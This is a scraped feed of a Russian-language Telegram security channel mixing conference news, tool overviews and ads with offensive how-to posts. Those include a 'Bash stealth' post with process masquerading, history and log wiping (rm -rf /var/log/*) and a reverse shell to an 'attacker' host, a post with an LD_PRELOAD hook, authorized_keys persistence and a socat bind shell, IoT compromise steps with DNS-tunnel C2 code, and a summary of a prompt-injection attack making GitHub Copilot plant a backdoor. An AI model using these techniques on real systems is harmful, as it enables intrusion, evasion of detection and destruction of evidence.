OFFZONE 2025: ключевые инсайты о трансформации киберугроз
21–22 августа в Москве прошла шестая конференция по практической кибербезопасности OFFZONE 2025, собравшая более 2500 специалистов. В программе — 98 докладов и обсуждения ключевых вызовов для отрасли.
Среди тем:
— уязвимости в парсерах и пентест Wi-Fi;
— применение AI и ML в кибербезопасности;
— багбаунти, Web3, OSINT и построение защищённых цифровых экосистем.
Наибольшее внимание привлекло исследование "Threat Zone 2025: обратная сторона", результаты которого представила компания BI.ZONE. Эксперты проанализировали более 5000 сообщений с теневых форумов и каналов:
— 20% атакующих группировок используют коммерческое ВПО;
— стоимость корпоративных аккаунтов на черном рынке стартует от $10;
— стилеры остаются самым популярным видом коммерческого ВПО.
Конференцию открыл Евгений Касперский докладом о кибериммунитете для цифровой эры, а всего своими инсайтами поделились более 120 экспертов.
Атмосфера была не менее яркой: квесты, квизы в телеграм-боте, HACK in 15 min, Craft.Zone, кастомные бейджи и даже Tattoo.Zone, где 21 участник набил логотип OFFZONE и получил пожизненную проходку на все будущие конференции.
ZeroDay | #безопасность
21–22 августа в Москве прошла шестая конференция по практической кибербезопасности OFFZONE 2025, собравшая более 2500 специалистов. В программе — 98 докладов и обсуждения ключевых вызовов для отрасли.
Среди тем:
— уязвимости в парсерах и пентест Wi-Fi;
— применение AI и ML в кибербезопасности;
— багбаунти, Web3, OSINT и построение защищённых цифровых экосистем.
Наибольшее внимание привлекло исследование "Threat Zone 2025: обратная сторона", результаты которого представила компания BI.ZONE. Эксперты проанализировали более 5000 сообщений с теневых форумов и каналов:
— 20% атакующих группировок используют коммерческое ВПО;
— стоимость корпоративных аккаунтов на черном рынке стартует от $10;
— стилеры остаются самым популярным видом коммерческого ВПО.
Конференцию открыл Евгений Касперский докладом о кибериммунитете для цифровой эры, а всего своими инсайтами поделились более 120 экспертов.
Атмосфера была не менее яркой: квесты, квизы в телеграм-боте, HACK in 15 min, Craft.Zone, кастомные бейджи и даже Tattoo.Zone, где 21 участник набил логотип OFFZONE и получил пожизненную проходку на все будущие конференции.
ZeroDay | #безопасность
❤13🔥10👍4👾2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17👍8💩6🍌1
Охотимся на Copilot 😏 Учебная промпт-инъекция для пентестеров
GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.
⏺ В статье поясняют, как устроена такая промпт-инъекция: как спрятать вредоносный текст от глаза мейнтейнера, как Copilot воспринимает контекст, и как формируются прям надежные эксплойты с низким риском обнаружения.
ZeroDay | #Статья
GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤🔥4👍2
APKHunt: анализ Android-приложений
👋
⏺ APKHunt - статический анализатор APK, заточенный под стандарты OWASP MASVS. Он сканирует безопасность хранения данных, работу с криптографией, использование разрешений и даже наличие отладочных функций.
⏺ Что классного: умеет сканировать сразу несколько APK, формирует лёгкие TXT-отчёты и поддерживает CI/CD-интеграцию. Так что его можно встроить прямо в пайплайн, чтобы каждый билд проходил проверку на автомате.
⏺ Кому пригодится: ну разрабам - чтобы не выпускать дырявые релизы, пентестерам, конечно - для ускорения аудита, а архитекторам - для контроля соблюдения стандартов безопасности.
⏺ Как потестить самому:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
git clone https://github.com/Cyber-Buddy/APKHunt.git
cd APKHunt
go run apkhunt.go -p app.apk -l
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤5🔥1😁1🤩1
This media is not supported in your browser
VIEW IN TELEGRAM
IoT и DNS-туннели: как закрепляются атакующие
👋
⏺ Как ломают:
1️⃣ Сначала ищут потенциальные цели через открытые источники (ripe.net, passive DNS) и сканят сеть с помощью masscan или Angry IP Scanner.
2️⃣ Находят уязвимый роутер, L3-коммутатор или камеру и запускают routersploit autopwn - перебор эксплойтов и брутфорс.
3️⃣ Дальше небольшой трюк: скомпрометированное устройство тянет пейлоад с VPS через встроенный wget и запускает его. Архитектуры любые: ARM, x86, MIPS и т.д.
4️⃣ Готово - IoT превращается в точку входа внутрь сети, через которую можно прокинуть SOCKS proxy и атаковать уже корпоративный сегмент.
⏺ В чем плюсы: на IoT нет антивирусов и EDR, системные вызовы никто не мониторит, логи не собирают. А значит, команда exec проходит беспрепятственно.
⏺ Где появляется DNS-туннелирование: даже если сеть сегментирована и фильтруется, малварь может «стучаться» на C2-панель через Do53/DoT/DoH, пряча команды в битах DNS-заголовков. Да, ответ на условный ls может идти сутки, но для хакера то главное - это закрепление в сети.
Пример из PoC:
⏺ В итоге у нас подломленное устройство раз в час резолвит «невинный» домен вроде
ZeroDay | #IoT
Приветствую в мире цифровой безопасности!
Сегодня посмотрим, как хакеры юзают IoT-устройства для входа в сеть и закрепляются через DNS-туннели.
Пример из PoC:
unsigned short __do53_query(char *_qname, __do53_type _qtype, unsigned char *_wire)
{
_wire[0] = // Вот здесь пейлоад
_wire[1] = // Вот здесь пейлоад
_wire[2] = 0x01;
_wire[3] = 0x00;
_wire[4] = 0x00;
_wire[5] = 0x01;
_wire[6] = 0x00;
_wire[7] = 0x00;
_wire[8] = 0x00;
_wire[9] = 0x00;
_wire[10] = 0x00;
_wire[11] = 0x00;
int query_lenght = __ascii_convertation_to_wire(_qname, &(_wire[12]));
int nextLoc = 12 + query_lenght + 1;
_wire[nextLoc] = 0x00;
_wire[++nextLoc] = 0x01;
_wire[++nextLoc] = 0x00;
_wire[++nextLoc] = 0x01;
return nextLoc + 1;
}
metrics-cisco.com
и получает команды в Additional-/Authority-секциях. Для NTA-систем это выглядит просто как обычный DNS-запрос.ZeroDay | #IoT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍9✍5😱3❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Шифруем скрипты
👋
⏺ Очень часто заказчики получают готовый продукт, но хотят защитить исходный код bash или Python-скриптов. Простая компиляция не помогает.
⏺ Как решить: Obash - это обфускатор и шифратор скриптов, который превращает их в исполняемые бинарники с AES-256 шифрованием и аппаратной привязкой.
⏺ Ключ и вектор инициализации берутся с железа, а не хардкодятся в бинарнике, что делает невозможным запуск скрипта на чужой машине. Даже если кто-то получит бинарь и посмотрит память или процессы, исходники не увидит.
⏺ Как его использовать:
⏺ Привязка к железу: для работы шифрования Obash берёт UUID и Serial устройства. Если рут-доступа нет, можно сделать локальные файлы:
И заменить пути в interpreter.c и obfuscated_bash.c:
⏺ Что происходит внутри: Obash шифрует скрипт AES-256, кодирует его в Base64, создаёт промежуточный C-файл (interpreter.c) с функциями интерпретации и компилирует бинарник. Сюда входят и ключи, и вектор, и шифротекст. Бинарник запускается только на целевой машине.
⏺ Вот пример тестового скрипта:
В следующем посте будем анализировать шифрованные скрипты
ZeroDay | #скрипты
Приветствую в мире цифровой безопасности!
Сегодня расскажу, как шифровать скрипты.
git clone https://github.com/louigi600/obash.git
cd obash/
sudo apt install libssl-dev
make
./obash testme
sudo cat /sys/devices/virtual/dmi/id/product_uuid > product_uuid
sudo cat /sys/devices/virtual/dmi/id/product_serial > product_serial
И заменить пути в interpreter.c и obfuscated_bash.c:
char prod_uuid[256]="./product_uuid";
char prod_serial[256]="./product_serial";
#!/bin/bash
echo "my pid is: $$"
echo $0
echo $*
read -p "enter something ... " A
echo $A
sleep 10 &
ps -ef | grep $$
ps -ef | grep $!
sleep 2
В следующем посте будем анализировать шифрованные скрипты
ZeroDay | #скрипты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤3❤🔥2💩1💘1
Анализируем шифрованные скрипты
👋
⏺ Создадим шифрованный скрипт:
Он работает пока рядом есть файлы product_serial и product_uuid. Удалим их, и запуск невозможен: именно они содержат данные для дешифрации.
⏺ Попробуем заглянуть внутрь. Если открыть testme.x в редакторе:
Видим блок Base64 с зашифрованным текстом и строки, явно указывающие на исходники Obash.
⏺ Дальше смотрим, какие библиотеки он тянет:
Среди зависимостей - libcrypto.so, что подтверждает использование AES.
⏺ Теперь глянем системные вызовы:
В логе видно, как программа считывает UUID и Serial, а в конце пишет во временный FIFO-файл /tmp/<PID> полный текст скрипта (175 байт, ровно как исходник). После чтения файл удаляется, но содержимое мы уже перехватили.
⏺ Автоматизируем. Сделаем подменный интерпретатор:
Запускаем с подменой:
В результате скрипт выводится целиком - никакого шифрования уже нет.
ZeroDay | #скрипты
Приветствую в мире цифровой безопасности!
Продолжим говорить о шифровании скриптов, сегодня же будем их анализировать.
./obash testme -o testme.x
Он работает пока рядом есть файлы product_serial и product_uuid. Удалим их, и запуск невозможен: именно они содержат данные для дешифрации.
mcedit testme.x
Видим блок Base64 с зашифрованным текстом и строки, явно указывающие на исходники Obash.
ldd ./testme.x
Среди зависимостей - libcrypto.so, что подтверждает использование AES.
strace -o log ./testme.x
В логе видно, как программа считывает UUID и Serial, а в конце пишет во временный FIFO-файл /tmp/<PID> полный текст скрипта (175 байт, ровно как исходник). После чтения файл удаляется, но содержимое мы уже перехватили.
gcc fake_interpreter.c -o bash
gcc fake_interpreter.c -o python
Запускаем с подменой:
PATH=.:$PATH ./testme.x
В результате скрипт выводится целиком - никакого шифрования уже нет.
ZeroDay | #скрипты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤4❤🔥2
Корреляция без SIEM: универсальный движок в действии
Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.
⏺ В статье показывают 7 примеров, где такой механизм реально работает: скоринг пользователей в UEBA, макрокорреляции для SOC, прогнозирование рисков в SGRC и даже контроль в АСУ ТП. Один и тот же инструмент, но для разного.
ZeroDay | #Статья
Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍2❤🔥1💘1
Bandit: быстрый поиск уязвимостей в Python-коде
👋
⏺ Bandit — классная утилита для поиска уязвимостей в Python-коде.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.
⏺ Python сегодня, очевидно, один из самых популярных языков, а значит и уязвимости в коде на нём часто становятся точкой входа для атак. Bandit может ловить проблемы ещё на этапе разработки или CI/CD. Утилита легко встраивается в пайплайн (pre-commit hooks, GitHub Actions, GitLab CI и пр.) и формирует отчёты в разных форматах — от JSON до HTML.
⏺ Быстрый старт:
Установка через pip:
Проверка всего проекта:
Или проверка конкретного файла:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.
Установка через pip:
pip install bandit
Проверка всего проекта:
bandit -r ./my_project
Или проверка конкретного файла:
bandit my_script.py
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤🔥4❤3
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для скрытности
👋
⏺ Подделка времени файлов: Чтобы файл не выделялся среди новых, можно «состарить» его:
Так скрипт выглядит как старый системный.
⏺ Маскировка процессов: В ps любой увидит ваш процесс. Но можно «притвориться»:
Теперь скрипт похож на системный или веб-сервер.
⏺ Работа без истории: Чтобы команды не остались в ~/.bash_history:
⏺ Алиасы для скрытности: Подменяем стандартные команды:
Первое прячет файлы, второе - убирает следы.
⏺ Скрытый сетевой трафик: Обратный шелл можно завуалировать под HTTPS:
Трафик пойдёт через порт 443, что выглядит в принципе привычно.
ZeroDay | #bash
Приветствую в мире цифровой безопасности!
Давай расскажу о 5 фишках Bash для того, чтобы работать тише.
touch -r /bin/ls hack.sh
touch -t 201801010101.01 hack.sh
Так скрипт выглядит как старый системный.
exec -a "[kworker/0:1H]" ./evil.sh
echo "httpd" > /proc/$$/comm
Теперь скрипт похож на системный или веб-сервер.
HISTFILE=/dev/null
set +o history
history -c && history -w
alias ls='ls --hide=hack.sh'
alias vanish='rm -rf ~/.bash_history /var/log/*'
Первое прячет файлы, второе - убирает следы.
bash -i >& /dev/tcp/attacker/443 0>&1
Трафик пойдёт через порт 443, что выглядит в принципе привычно.
ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22❤6😱2😁1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ LD_PRELOAD для подмены системных вызовов: Если у вас есть возможность писать в /tmp, можно внедрить свою библиотеку. Например, перехватить вызов open() и переправить его в свой файл. Создаём evil.c:
➡️ Собираем:
➡️ Запускаем:
⏺ SSH-ключи без пароля: Многие забывают, что authorized_keys поддерживает опции. Можно добавить туда ключ с хитрым префиксом:
Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».
⏺ Socat как универсальный биндер: Иногда на цели нет nc, а нужен обратный шелл или проброс. Socat поможет тут:
Или проброс порта с шифрованием:
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.
#include <stdio.h>
#include <dlfcn.h>
#include <fcntl.h>
int open(const char *path, int flags, ...) {
static int (*orig_open)(const char*, int, ...) = NULL;
if (!orig_open) orig_open = dlsym(RTLD_NEXT, "open");
if (strstr(path, "shadow")) return orig_open("/etc/passwd", flags);
return orig_open(path, flags);
}
gcc -fPIC -shared -o evil.so evil.c -ldl
LD_PRELOAD=./evil.so target_binary
command="/bin/bash -i" ssh-rsa AAAAB3...
Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
Или проброс порта с шифрованием:
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:22
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤5
1,5 трлн рублей — ущерб от кибератак в 2025 году
Станислав Кузнецов, зампред правления Сбербанка, на Восточном экономическом форуме заявил: при сохранении текущих трендов совокупный ущерб для экономики России от кибератак может достигнуть 1,5 трлн руб.
Атак стало в 3 раза больше только за последний год. Киберпреступники действуют системнее, а их цели становятся всё более масштабными.
🟢 Эти цифры — сигнал бизнесу и госструктурам: вопрос киберзащиты уже не про «технический отдел», а про выживание экономики.
ZeroDay | #безопасность
Станислав Кузнецов, зампред правления Сбербанка, на Восточном экономическом форуме заявил: при сохранении текущих трендов совокупный ущерб для экономики России от кибератак может достигнуть 1,5 трлн руб.
Атак стало в 3 раза больше только за последний год. Киберпреступники действуют системнее, а их цели становятся всё более масштабными.
🟢 Эти цифры — сигнал бизнесу и госструктурам: вопрос киберзащиты уже не про «технический отдел», а про выживание экономики.
ZeroDay | #безопасность
❤17🤮6🔥4😁4👍3
Какой метод чаще всего юзают хакеры для обхода сигнатурного IDS?
Anonymous Quiz
13%
Использование нестандартных портов
57%
Фрагментация пакетов и изменение порядка TCP-сегментов
19%
Маскировка IP через прокси
11%
Смена User-Agent
❤12❤🔥3😁3
Сегодня не про тулзы, а про инструмент, который стоит выше любого сканера — английский язык.
— простые объяснения грамматики
— фразы из реальной жизни
— лучшие учебники для обучения
— тексты и упражнения
— визуальные шпаргалки
И главное там уже есть бесплатный план изучения английского.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍6👏2
Новая атака группы APT28 на компании в странах НАТО
👋
⏺ NotDoor - что это: VBA-бэкдор для Outlook, который следит за входящей почтой и ждёт «триггерного» письма. Как только оно приходит, хакеры могут забирать файлы, слать данные и выполнять команды на вашей машине. Название связано с тем, что в коде часто встречается слово “Nothing”.
⏺ Как он попадает в систему: через OneDrive с хитрой техникой DLL side-loading. Запускается DLL (SSPICLI.dll) и сразу отключает защиту макросов. Дальше PowerShell-команды шифруют данные, создают устойчивость через реестр и делают всё максимально незаметно.
⏺ Что делает внутри: VBA слушает события Outlook (MAPILogonComplete и NewMailEx), создаёт папку %TEMP%\Temp для временных файлов и отсылает их на Proton Mail. Письма с триггером, например «Daily Report», заставляют выполнять встроенные команды.
⏺ Какие команды умеет: cmd - выполнить команду и прислать результат, cmdno - выполнить тихо, dwn - украсть файлы, upl - загрузить файлы на машину жертвы.
⏺ Скрытность и фишки: хакеры используют Microsoft Dev Tunnels и Telegram для скрытой связи с C2, ротацию доменов через Cloudflare Workers, маскируют трафик под обычные сервисы - почти полностью «невидимы».
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Сегодня разберём кампанию российской группировки APT28, нацеленную на компании в странах НАТО.
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤8👎4🤔2🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁44🤮16🤣9❤5💋2
Самая востребованная IT-профессия в 2025 году
Спрос на специалистов по кибербезопасности постоянно растёт. По данным Positive Technologies к 2027 году потребность в таких кадрах увеличится до 261 тыс. человек.
В сфере информационной безопасности ценится образование. Если поступите в магистратуру «Кибербезопасность», вашу квалификацию подтвердит диплом ВШЭ. Все занятия здесь проходят онлайн, а студенты получают льготы очного обучения.
В программе много практики: реальные задачи специалиста, лабораторные работы, киберучения и стажировка. За 2 года вы научитесь:
- программировать на Python;
- работать с криптографическими методами защиты;
- проводить оценку сетевой инфраструктуры;
- выстраивать защиту сетей компании.
Количество мест ограничено. Воспользуйтесь возможностью и начните путь к новой карьере
Реклама. ООО "Нетология". ИНН 7726464125 Erid 2VSb5z5M9kd
Спрос на специалистов по кибербезопасности постоянно растёт. По данным Positive Technologies к 2027 году потребность в таких кадрах увеличится до 261 тыс. человек.
В сфере информационной безопасности ценится образование. Если поступите в магистратуру «Кибербезопасность», вашу квалификацию подтвердит диплом ВШЭ. Все занятия здесь проходят онлайн, а студенты получают льготы очного обучения.
В программе много практики: реальные задачи специалиста, лабораторные работы, киберучения и стажировка. За 2 года вы научитесь:
- программировать на Python;
- работать с криптографическими методами защиты;
- проводить оценку сетевой инфраструктуры;
- выстраивать защиту сетей компании.
Количество мест ограничено. Воспользуйтесь возможностью и начните путь к новой карьере
Реклама. ООО "Нетология". ИНН 7726464125 Erid 2VSb5z5M9kd
❤4
Свой мессенджер вместо MAX: Matrix и XMPP на домашнем сервере
В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.
⏺ В статье рассказывается, как на своём сервере автор развернул два конкурирующих протокола - Matrix (Synapse) и XMPP (Ejabberd) - и сравнил их на практике. Пошагово показано разворачивание в Docker с Portainer, объясняется, зачем нужен Coturn для звонков, и какие клиенты удобнее в реальной жизни (спойлер: родители тоже тестировали).
ZeroDay | #Статья
В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17😁10❤3🤡2👍1💘1
Все на борт! CyberCamp 2025 открыл регистрацию ⚡️
20-25 октября пройдет IV практическая онлайн-конференция по кибербезопасности CyberCamp 2025. Это крупнейшие киберучения в России, где проверяют готовность к атакам и прокачивают реальные навыки.
Тема этого года — киберустойчивость: как действовать, когда атаки на компании не прекращаются ни на минуту.
🔹40+ докладов от экспертов «Инфосистемы Джет», ВI.ZONЕ, Positive Technologies, OZON Tech, «Лаборатории Касперского», Biocad и др.
🔹10 000+ соло-участников и 40+ интерактивных заданий
🔹1000 игроков в командных киберучениях и 15+ реальных сценариев
🔹Консультации 1:1 с топовыми экспертами кибербеза, онлайн-курсы и практика от ведущих учебных центров
🔹Призовой фонд — 7 000 000 ₽
Регистрируйся прямо сейчас и получи доступ к первым заданиям ⭐️
20-25 октября пройдет IV практическая онлайн-конференция по кибербезопасности CyberCamp 2025. Это крупнейшие киберучения в России, где проверяют готовность к атакам и прокачивают реальные навыки.
Тема этого года — киберустойчивость: как действовать, когда атаки на компании не прекращаются ни на минуту.
🔹40+ докладов от экспертов «Инфосистемы Джет», ВI.ZONЕ, Positive Technologies, OZON Tech, «Лаборатории Касперского», Biocad и др.
🔹10 000+ соло-участников и 40+ интерактивных заданий
🔹1000 игроков в командных киберучениях и 15+ реальных сценариев
🔹Консультации 1:1 с топовыми экспертами кибербеза, онлайн-курсы и практика от ведущих учебных центров
🔹Призовой фонд — 7 000 000 ₽
Регистрируйся прямо сейчас и получи доступ к первым заданиям ⭐️
❤🔥3👍3❤1